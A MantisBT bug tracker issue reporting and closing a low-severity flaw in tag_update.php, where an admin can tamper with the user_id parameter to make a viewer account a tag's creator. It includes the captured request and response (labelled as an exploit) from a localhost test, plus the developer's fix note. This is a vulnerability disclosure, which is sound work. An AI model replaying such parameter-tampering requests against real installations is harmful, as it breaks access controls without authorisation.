View Issue Details

IDProjectCategoryView StatusLast Update
0027283mantisbtsecuritypublic2020-09-25 14:53
Reporterd3vpoo1 Assigned Todregad  
PrioritynormalSeveritytweakReproducibilityalways
Status closedResolutionfixed 
PlatformWindowsOSWindowsOS VersionWindows 10
Target Version2.24.3Fixed in Version2.24.3 
Summary0027283: Admin can set viewer as a tag creator
Description

The endpoint tag_update.php allows the admin to set the viewer as a tag creator

Steps To Reproduce
  • Login as your admin account

  • Go to manage > manage tags

  • Select any tags

  • Open the update page by clicking the update tag button

  • Open your intercept

  • Submit it

Request


POST /mantisbt2/tag_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/tag_update_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_PROJECT_COOKIE=2; PHPSESSID=u3jfpkfngcgqmr3mgcfq2ip913; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=8%2C5
Upgrade-Insecure-Requests: 1

tag_id=2&tag_update_token=20200913ZSA8qpB9az4sp0UYftL8R-6tSHhobA9Z&name=xxx&user_id=1&description=Tag

Response

HTTP/1.1 302 Found
Date: Sun, 13 Sep 2020 04:16:16 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sun, 13 Sep 2020 04:16:16 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sun, 13 Sep 2020 04:16:16 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt2/tag_view_page.php?tag_id=2
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

Attack scenario : Do the same thing and edit the value of user_id to your viewer account in my case my viewer account id is 4

Exploit request

POST /mantisbt2/tag_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/tag_update_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_PROJECT_COOKIE=2; PHPSESSID=u3jfpkfngcgqmr3mgcfq2ip913; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=8%2C5
Upgrade-Insecure-Requests: 1

tag_id=2&tag_update_token=20200913mHy8SlN9pxvwdexRaAZRaZfclmY5ciQ-&name=xxx&user_id=4&description=Tag

Exploit response

HTTP/1.1 302 Found
Date: Sun, 13 Sep 2020 04:18:46 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sun, 13 Sep 2020 04:18:46 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sun, 13 Sep 2020 04:18:46 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt2/tag_view_page.php?tag_id=2
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
  • Refresh the site and you successfully set viewer as a tag creator
Additional Information

None

TagsNo tags attached.
Attached Files
tag_creator.png (1,597 bytes)   
tag_creator.png (1,597 bytes)   

Activities

d3vpoo1

d3vpoo1

2020-09-13 00:48

reporter   ~0064427

Please change the summary to Admin can set viewer as a tag creator I didn't notice that I delete the first title of this issue. Thanks..

dregad

dregad

2020-09-19 03:46

developer   ~0064449

Please change the summary

Done

Bug is confirmed. Fix in PR https://mantisbt.org/bugs/view.php?id=27283

Related Changesets

MantisBT: master-2.24 26bbae76

2020-09-20 06:54

dregad


Details Diff
Don't assign tag to user not allowed to create one

As suggested by @atrol, the checks are performed in Tag API.

Fixes 0027283
Affected Issues
0027283
mod - core/tag_api.php Diff File